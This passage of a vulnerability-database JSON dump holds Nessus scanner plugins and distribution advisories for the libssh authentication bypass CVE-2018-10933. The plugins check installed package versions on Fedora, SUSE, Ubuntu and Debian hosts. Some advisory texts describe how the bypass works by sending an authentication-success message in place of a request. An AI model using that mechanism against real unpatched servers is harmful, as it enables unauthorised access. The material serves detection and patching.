script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:29\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^29([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 29\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC29\", reference:\"libssh-0.8.4-1.fc29\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libssh\");\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-05-16T04:36:10", "description": "This update for libssh fixes the following issues :\n\nSecurity issue fixed :\n\nCVE-2018-10933: Fixed a server mode authentication bypass\n(bsc#1108020).\n\nNon security issue fixed: Fix popd syntax to be compatible with newer\nversions of the bash shell.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "cvss3": {"score": 9.1, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"}, "published": "2018-10-22T00:00:00", "title": "SUSE SLED12 Security Update : libssh (SUSE-SU-2018:3253-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10933"], "modified": "2018-10-22T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:libssh4-debuginfo", "p-cpe:/a:novell:suse_linux:libssh4", "p-cpe:/a:novell:suse_linux:libssh-debugsource"], "id": "SUSE_SU-2018-3253-1.NASL", "href": "https://www.tenable.com/plugins/nessus/118306", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:3253-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118306);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/15\");\n\n script_cve_id(\"CVE-2018-10933\");\n script_xref(name:\"IAVA\", value:\"2018-A-0347-S\");\n\n script_name(english:\"SUSE SLED12 Security Update : libssh (SUSE-SU-2018:3253-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libssh fixes the following issues :\n\nSecurity issue fixed :\n\nCVE-2018-10933: Fixed a server mode authentication bypass\n(bsc#1108020).\n\nNon security issue fixed: Fix popd syntax to be compatible with newer\nversions of the bash shell.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1108020\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10933/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20183253-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?aa697192\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP3:zypper in -t patch\nSUSE-SLE-WE-12-SP3-2018-2320=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2018-2320=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2018-2320=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libssh-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libssh4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libssh4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/22\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libssh-debugsource-0.6.3-12.6.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libssh4-0.6.3-12.6.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libssh4-debuginfo-0.6.3-12.6.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libssh\");\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-05-16T05:00:30", "description": "Peter Winter-Smith discovered that libssh incorrectly handled\nauthentication when being used as a server. A remote attacker could\nuse this issue to bypass authentication without any credentials.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 16, "cvss3": {"score": 9.1, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"}, "published": "2018-10-18T00:00:00", "title": "Ubuntu 14.04 LTS / 16.04 LTS / 18.04 LTS : libssh vulnerability (USN-3795-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10933"], "modified": "2018-10-18T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:libssh-4", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3795-1.NASL", "href": "https://www.tenable.com/plugins/nessus/118200", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3795-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118200);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/15\");\n\n script_cve_id(\"CVE-2018-10933\");\n script_xref(name:\"USN\", value:\"3795-1\");\n script_xref(name:\"IAVA\", value:\"2018-A-0347-S\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS / 18.04 LTS : libssh vulnerability (USN-3795-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Peter Winter-Smith discovered that libssh incorrectly handled\nauthentication when being used as a server. A remote attacker could\nuse this issue to bypass authentication without any credentials.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3795-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libssh-4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libssh-4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/18\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2019 Canonical, Inc. / NASL script (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04|16\\.04|18\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 16.04 / 18.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libssh-4\", pkgver:\"0.6.1-0ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libssh-4\", pkgver:\"0.6.3-4.3ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libssh-4\", pkgver:\"0.8.0~20170825.94fa1e38-1ubuntu0.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libssh-4\");\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-01-12T09:39:56", "description": "Peter Winter-Smith of NCC Group discovered that libssh, a tiny C SSH\nlibrary, contains an authentication bypass vulnerability in the server\ncode. An attacker can take advantage of this flaw to successfully\nauthenticate without any credentials by presenting the server an\nSSH2_MSG_USERAUTH_SUCCESS message in place of the\nSSH2_MSG_USERAUTH_REQUEST message which the server would expect to\ninitiate authentication.\n\nFor Debian 8 'Jessie', this problem has been fixed in version\n0.6.3-4+deb8u3.\n\nWe recommend that you upgrade your libssh packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 16, "cvss3": {"score": 9.1, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"}, "published": "2018-10-19T00:00:00", "title": "Debian DLA-1548-1 : libssh security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10933"], "modified": "2018-10-19T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:libssh-doc", "p-cpe:/a:debian:debian_linux:libssh-gcrypt-4", "p-cpe:/a:debian:debian_linux:libssh-gcrypt-dev", "p-cpe:/a:debian:debian_linux:libssh-dbg", "p-cpe:/a:debian:debian_linux:libssh-dev", "p-cpe:/a:debian:debian_linux:libssh-4"], "id": "DEBIAN_DLA-1548.NASL", "href": "https://www.tenable.com/plugins/nessus/118214", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1548-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(118214);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2018-10933\");\n script_xref(name:\"IAVA\", value:\"2018-A-0347-S\");\n\n script_name(english:\"Debian DLA-1548-1 : libssh security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Peter Winter-Smith of NCC Group discovered that libssh, a tiny C SSH\nlibrary, contains an authentication bypass vulnerability in the server\ncode. An attacker can take advantage of this flaw to successfully\nauthenticate without any credentials by presenting the server an\nSSH2_MSG_USERAUTH_SUCCESS message in place of the\nSSH2_MSG_USERAUTH_REQUEST message which the server would expect to\ninitiate authentication.\n\nFor Debian 8 'Jessie', this problem has been fixed in version\n0.6.3-4+deb8u3.\n\nWe recommend that you upgrade your libssh packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2018/10/msg00010.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/libssh\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libssh-4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libssh-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libssh-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libssh-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libssh-gcrypt-4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libssh-gcrypt-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/18\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/19\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libssh-4\", reference:\"0.6.3-4+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libssh-dbg\", reference:\"0.6.3-4+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libssh-dev\", reference:\"0.6.3-4+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libssh-doc\", reference:\"0.6.3-4+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libssh-gcrypt-4\", reference:\"0.6.3-4+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libssh-gcrypt-dev\", reference:\"0.6.3-4+deb8u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-01-20T12:34:08", "description": "This update for libssh fixes the following issues :\n\n - CVE-2018-10933: Fixed a server mode authentication\n bypass (bsc#1108020).\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "edition": 17, "cvss3": {"score": 9.1, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"}, "published": "2018-10-18T00:00:00", "title": "openSUSE Security Update : libssh (openSUSE-2018-1180)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10933"], "modified": "2018-10-18T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libssh4-32bit", "p-cpe:/a:novell:opensuse:libssh-debugsource", "cpe:/o:novell:opensuse:15.0", "p-cpe:/a:novell:opensuse:libssh4-debuginfo", "p-cpe:/a:novell:opensuse:libssh4", "p-cpe:/a:novell:opensuse:libssh4-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libssh-devel"], "id": "OPENSUSE-2018-1180.NASL", "href": "https://www.tenable.com/plugins/nessus/118191", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-1180.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(118191);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-10933\");\n script_xref(name:\"IAVA\", value:\"2018-A-0347-S\");\n\n script_name(english:\"openSUSE Security Update : libssh (openSUSE-2018-1180)\");\n script_summary(english:\"Check for the openSUSE-2018-1180 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libssh fixes the following issues :\n\n - CVE-2018-10933: Fixed a server mode authentication\n bypass (bsc#1108020).\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1108020\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libssh packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libssh-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libssh-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libssh4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libssh4-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libssh4-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libssh4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/17\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/18\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libssh-debugsource-0.7.5-lp150.5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libssh-devel-0.7.5-lp150.5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libssh4-0.7.5-lp150.5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libssh4-debuginfo-0.7.5-lp150.5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libssh4-32bit-0.7.5-lp150.5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libssh4-32bit-debuginfo-0.7.5-lp150.5.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libssh-debugsource / libssh-devel / libssh4 / libssh4-debuginfo / etc\");\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "saint": [{"lastseen": "2019-06-04T23:19:31", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10933"], "description": "Added: 10/29/2018 \nBID: [105677](<http://www.securityfocus.com/bid/105677>) \n\n\n### Background\n\n[libssh](<https://www.libssh.org/>) is a C library implementing the SSHv2 protocol. \n\n### 